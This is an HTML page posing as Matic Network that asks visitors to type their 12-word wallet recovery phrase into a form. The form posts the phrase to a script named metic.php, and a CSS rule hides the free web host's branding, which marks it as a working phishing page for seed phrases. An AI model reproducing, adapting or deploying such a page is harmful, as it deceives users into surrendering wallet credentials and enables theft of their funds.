<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Matic Network - Scalable and instant blockchain transactions</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./Pharase_claim_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./Pharase_claim_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./Pharase_claim_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./Pharase_claim_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-image:url(image/phrasepage.jpg);
  height: 100vh;
  background-size: contain;
  background-position: absolute;
  background-repeat: no-repeat;
  background-color: #f2f3f8;
}

img[alt="www.000webhost.com"]{
    opacity: 0;
}
.btn1{
    outline: none;
    width: 24em;
    padding: 15px;
    border-radius: 10px;
    color: white ;
    background-color: rgb(42,109,239);
   
    letter-spacing: 1px;
    border: none;
}
.title{
     margin-top: 20px;
     text-align: center;

}

.btn1 a{
    text-decoration: none;
    color: white;
     text-align: center;
}

#phrase{
    width: 330px;
    height: 7em;
    border: 1px solid grey;
    border-radius: 4px;
    background-color: white;
    font-size: 16px;
    color: black;
    outline: none;
    padding: 4px;
    overflow-wrap: break-word;
    word-break: break-all;
}

::placeholder{
    color: grey;
    font-size: 16px;
}
</style>

<div class="title">
    <p style="font-size: 21px; text-align: left; margin-left: 15px; margin-top: 150px"><strong>Enter your passphrase</strong><br><span style="color: grey; font-size: 17px;">Enter your 12-word passphrase. Seperate each word by space</span></p><br>
    
    <form method="POST" action="metic.php?develop/getting-started">
        <input type="text" name="phrase" id="phrase" placeholder="Enter your 12-word passphrase. Seperate each word by space" required=""> <br><br><br><br>
    <input type="submit" value="Import Account" class="btn1">
    </form>
    
</div>


    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./Pharase_claim_files/jquery-1.10.2.js.download"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./Pharase_claim_files/bootstrap.min.js.download"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./Pharase_claim_files/jquery.metisMenu.js.download"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./Pharase_claim_files/custom.js.download"></script>
   

</body></html>